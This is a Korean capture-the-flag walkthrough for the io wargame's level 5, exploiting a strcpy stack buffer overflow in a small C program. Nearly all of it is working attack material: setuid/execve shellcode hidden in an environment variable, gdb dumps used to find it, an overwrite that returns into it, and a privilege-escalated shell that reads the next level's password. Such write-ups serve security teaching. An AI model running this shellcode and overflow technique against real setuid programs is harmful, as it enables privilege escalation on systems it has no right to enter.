Level 5의 소스는 아래와 같다.
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv) {
char buf[128];
if(argc < 2) return 1;
strcpy(buf, argv[1]);
printf("%s\n", buf);
return 0;
}
문제는 간단하다. argv[1]을 buf 변수에 strcpy() 함수를 이용하여 옮기나 buf 변수의 크기보다 더 많은 값을 넣으면 오버플로우가 될것임을 알 수 있다.
따라서 환경변수에 NOP + SHELLCODE를 등록시킨 후 gdb를 통해 주소를 확인한 후 공격을 해보도록 하자.
level5@io:/levels$ ./level05 `python -c "print 'A'*140"`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault
level5@io:/levels$ export SHELLCODE=`python -c "print '\x90'*100 + '\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80'"`
level5@io:/levels$ gdb level05
GNU gdb 6.8-debian
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...
(gdb) b main
Breakpoint 1 at 0x80483bd
(gdb) r
Starting program: /levels/level05
Breakpoint 1, 0x080483bd in main ()
(gdb) x/32wx $esp
0xbfffdc10: 0x00000000 0x00000000 0xbfffdcb0 0xbfffdca4
0xbfffdc20: 0x00000000 0x00000000 0x00000000 0xbfffdcf0
0xbfffdc30: 0x00855668 0x0804820b 0x00000000 0x00000000
0xbfffdc40: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffdc50: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffdc60: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffdc70: 0x00000000 0x00000000 0xbfffde24 0x08048320
0xbfffdc80: 0x003bdff4 0x0804960c 0xbfffdc98 0x08048291
(gdb)
0xbfffdc90: 0x003bdff4 0xbfffdd4c 0xbfffdcb8 0x08048489
0xbfffdca0: 0x00848250 0x080482f0 0x00000000 0x003bdff4
0xbfffdcb0: 0x08048470 0x080482f0 0xbfffdd18 0x0029a455
0xbfffdcc0: 0x00000001 0xbfffdd44 0xbfffdd4c 0x00f8ab18
0xbfffdcd0: 0x00000001 0x00000001 0x00000000 0x0804820b
0xbfffdce0: 0x003bdff4 0x08048470 0x080482f0 0xbfffdd18
0xbfffdcf0: 0xebb98081 0x474835fe 0x00000000 0x00000000
0xbfffdd00: 0x00000000 0x0084d2e0 0x0029a37d 0x00854ff4
(gdb)
0xbfffdd10: 0x00000001 0x080482f0 0x00000000 0x08048311
0xbfffdd20: 0x080483b4 0x00000001 0xbfffdd44 0x08048470
0xbfffdd30: 0x08048420 0x00848250 0xbfffdd3c 0x00852ae5
0xbfffdd40: 0x00000001 0xbfffde24 0x00000000 0xbfffde34
0xbfffdd50: 0xbfffdec1 0xbfffded1 0xbfffdedc 0xbfffdefe
0xbfffdd60: 0xbfffdf11 0xbfffdf1d 0xbfffdf29 0xbfffdf56
0xbfffdd70: 0xbfffdf6c 0xbfffdf7b 0xbfffdf87 0xbfffdf90
0xbfffdd80: 0xbfffdfa2 0xbfffdfaa 0xbfffdfb9 0x00000000
(gdb)
0xbfffdd90: 0x00000010 0xbfebfbff 0x00000006 0x00001000
0xbfffdda0: 0x00000011 0x00000064 0x00000003 0x08048034
0xbfffddb0: 0x00000004 0x00000020 0x00000005 0x00000007
0xbfffddc0: 0x00000007 0x0083a000 0x00000008 0x00000000
0xbfffddd0: 0x00000009 0x080482f0 0x0000000b 0x000003ed
0xbfffdde0: 0x0000000c 0x000003ed 0x0000000d 0x000003ed
0xbfffddf0: 0x0000000e 0x000003ed 0x00000017 0x00000000
0xbfffde00: 0x0000000f 0xbfffde1b 0x00000000 0x00000000
(gdb)
0xbfffde10: 0x00000000 0x00000000 0x69000000 0x00363836
0xbfffde20: 0x00000000 0x76656c2f 0x2f736c65 0x6576656c
0xbfffde30: 0x0035306c 0x4c454853 0x444f434c 0x90903d45
0xbfffde40: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffde50: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffde60: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffde70: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffde80: 0x90909090 0x90909090 0x90909090 0x90909090
(gdb)
0xbfffde90: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffdea0: 0x176a9090 0xcddb3158 0x580b6a80 0x2f685299
0xbfffdeb0: 0x6868732f 0x6e69622f 0x5352e389 0x80cde189
0xbfffdec0: 0x45485300 0x2f3d4c4c 0x2f6e6962 0x68736162
0xbfffded0: 0x52455400 0x696c3d4d 0x0078756e 0x5f485353
0xbfffdee0: 0x45494c43 0x323d544e 0x322e3131 0x312e3831
0xbfffdef0: 0x39392e36 0x39333220 0x32203034 0x53530032
0xbfffdf00: 0x54545f48 0x642f3d59 0x702f7665 0x322f7374
(gdb)
0xbfffdf10: 0x45535500 0x656c3d52 0x356c6576 0x4c4f4300
0xbfffdf20: 0x534e4d55 0x3134313d 0x54415000 0x752f3d48
0xbfffdf30: 0x6c2f7273 0x6c61636f 0x6e69622f 0x73752f3a
0xbfffdf40: 0x69622f72 0x622f3a6e 0x2f3a6e69 0x2f727375
0xbfffdf50: 0x656d6167 0x414d0073 0x2f3d4c49 0x2f726176
0xbfffdf60: 0x6c69616d 0x76656c2f 0x00356c65 0x752f3d5f
0xbfffdf70: 0x622f7273 0x672f6e69 0x50006264 0x2f3d4457
0xbfffdf80: 0x6576656c 0x4c00736c 0x53454e49 0x0038323d
(gdb) q
The program is running. Exit anyway? (y or n) y
level5@io:/levels$ ./level05 `python -c "print 'A'*140 + '\x60\xde\xff\xbf'"`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA`??
sh-3.2$ id
uid=1005(level5) gid=1005(level5) euid=1006(level6) groups=1005(level5),1029(nosu)
sh-3.2$ cat /home/level06/.pass
cat: /home/level06/.pass: No such file or directory
sh-3.2$ cat /home/level6/.pass
mobjy2we
sh-3.2$